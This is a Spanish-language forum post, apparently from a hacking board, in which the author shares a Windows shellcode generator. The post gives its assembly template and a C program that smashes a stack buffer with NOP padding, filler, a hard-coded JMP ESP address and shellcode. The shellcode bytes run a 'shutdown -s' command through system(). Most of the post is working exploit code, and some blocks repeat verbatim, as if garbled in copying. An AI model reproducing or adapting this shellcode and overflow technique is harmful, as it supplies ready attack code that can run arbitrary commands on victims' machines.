Autor
aquí les dejo un generador de shellcodes echo por mi. las shellcodes q genera acen LoadLibraryA a msvcrt.dll y luego usan system para ejecutar cualquier argumento.
Las shellcodes generadas son de la forma:
Código:
mov ebp,esp
xor edi,edi
sub esp,0Ch
mov dword ptr [ebp-0Ch],6376736Dh
mov dword ptr [ebp-08h],642E7472h
mov dword ptr [ebp-04h],01016C6Ch
mov [ebp-02h],edi
lea eax,[ebp-0Ch]
push eax
mov ebx,7C801D77h
call ebx
sub esp,0Ch //esto lo cambia el generador segun la longitud del argumento
mov dword ptr [ebp-0Ch],65676572h
mov dword ptr [ebp-08h],2E746964h
mov dword ptr [ebp-04h],01657865h //depende de la divisibilidad por 4 el generador pondra mas o menos 01 al final
mov [ebp-01h],edi
lea eax,[ebp-0Ch] //esto tb depende de la longitud del argumento
push eax
mov ebx,0x77bf93c7
call ebx
el generador lo q deja elegir son los offsets de LoadLibraryA y de system y tambien el argumento de system.xor edi,edi
sub esp,0Ch
mov dword ptr [ebp-0Ch],6376736Dh
mov dword ptr [ebp-08h],642E7472h
mov dword ptr [ebp-04h],01016C6Ch
mov [ebp-02h],edi
lea eax,[ebp-0Ch]
push eax
mov ebx,7C801D77h
call ebx
sub esp,0Ch //esto lo cambia el generador segun la longitud del argumento
mov dword ptr [ebp-0Ch],65676572h
mov dword ptr [ebp-08h],2E746964h
mov dword ptr [ebp-04h],01657865h //depende de la divisibilidad por 4 el generador pondra mas o menos 01 al final
mov [ebp-01h],edi
lea eax,[ebp-0Ch] //esto tb depende de la longitud del argumento
push eax
mov ebx,0x77bf93c7
call ebx
un programa para provar una shellcode echa con este generador podria ser:
Código:
#include <stdio.h>
#include <string.h>
#include <windows.h>
int main()
{
char buffer[512];
char ShellCodeParaEjecutar[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x8B\xEC\x33\xFF\x83\xEC\x0C\xC7\x45\xF4\x6D\x73\x76\x63\xC7\x45\xF8\x72\x74\x2E\x64\xC7\x45\xFC\x6C\x6C\x01\x01\x66\x89\x7D\xFE\x8D\x45\xF4\x50\xBB\x77\x1D\x80\x7C\xFF\xD3\x83\xEC\x40\xC7\x45\xC0\x73\x68\x75\x74\xC7\x45\xC4\x64\x6F\x77\x6E\xC7\x45\xC8\x20\x2D\x73\x20\xC7\x45\xCC\x2D\x63\x20\x22\xC7\x45\xD0\x48\x6F\x6C\x61\xC7\x45\xD4\x2C\x20\x65\x73\xC7\x45\xD8\x74\x6F\x20\x65\xC7\x45\xDC\x73\x20\x75\x6E\xC7\x45\xE0\x61\x20\x53\x68\xC7\x45\xE4\x65\x6C\x6C\x43\xC7\x45\xE8\x6F\x64\x65\x20\xC7\x45\xEC\x64\x65\x20\x4E\xC7\x45\xF0\x49\x4D\x4F\x58\xC7\x45\xF4\x54\x22\x20\x2D\xC7\x45\xF8\x74\x20\x35\x30\xC7\x45\xFC\x30\x01\x01\x01\x89\x7D\xFD\x8D\x45\xC0\x50\xBB\xC7\x93\xBF\x77\xFF\xD3";
char Basura[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA????";
char OffsetParaSaltar[]= "\xED\x1E\x95\x7C";
char ShellCodeParaSaltar[]="\x8B\xC4\x80\xEC\x02\x8B\xE0\xFF\xE4";
char StringMalicioso[1024];
strcpy( StringMalicioso,ShellCodeParaEjecutar);
strcat( StringMalicioso, Basura );
strcat( StringMalicioso, OffsetParaSaltar );
strcat( StringMalicioso, ShellCodeParaSaltar );
printf("Empezemos la ShellCode ahora:\n");
strcpy (buffer, StringMalicioso);
return 0;
}
offset para saltar sera el ofset de un JMP ESP,shellcode para saltar resta 512 a ESP y salta a ESP para ponernos al principio del buffer.#include <string.h>
#include <windows.h>
int main()
{
char buffer[512];
char ShellCodeParaEjecutar[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x8B\xEC\x33\xFF\x83\xEC\x0C\xC7\x45\xF4\x6D\x73\x76\x63\xC7\x45\xF8\x72\x74\x2E\x64\xC7\x45\xFC\x6C\x6C\x01\x01\x66\x89\x7D\xFE\x8D\x45\xF4\x50\xBB\x77\x1D\x80\x7C\xFF\xD3\x83\xEC\x40\xC7\x45\xC0\x73\x68\x75\x74\xC7\x45\xC4\x64\x6F\x77\x6E\xC7\x45\xC8\x20\x2D\x73\x20\xC7\x45\xCC\x2D\x63\x20\x22\xC7\x45\xD0\x48\x6F\x6C\x61\xC7\x45\xD4\x2C\x20\x65\x73\xC7\x45\xD8\x74\x6F\x20\x65\xC7\x45\xDC\x73\x20\x75\x6E\xC7\x45\xE0\x61\x20\x53\x68\xC7\x45\xE4\x65\x6C\x6C\x43\xC7\x45\xE8\x6F\x64\x65\x20\xC7\x45\xEC\x64\x65\x20\x4E\xC7\x45\xF0\x49\x4D\x4F\x58\xC7\x45\xF4\x54\x22\x20\x2D\xC7\x45\xF8\x74\x20\x35\x30\xC7\x45\xFC\x30\x01\x01\x01\x89\x7D\xFD\x8D\x45\xC0\x50\xBB\xC7\x93\xBF\x77\xFF\xD3";
char Basura[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA????";
char OffsetParaSaltar[]= "\xED\x1E\x95\x7C";
char ShellCodeParaSaltar[]="\x8B\xC4\x80\xEC\x02\x8B\xE0\xFF\xE4";
char StringMalicioso[1024];
strcpy( StringMalicioso,ShellCodeParaEjecutar);
strcat( StringMalicioso, Basura );
strcat( StringMalicioso, OffsetParaSaltar );
strcat( StringMalicioso, ShellCodeParaSaltar );
printf("Empezemos la ShellCode ahora:\n");
strcpy (buffer, StringMalicioso);
return 0;
}
En línea
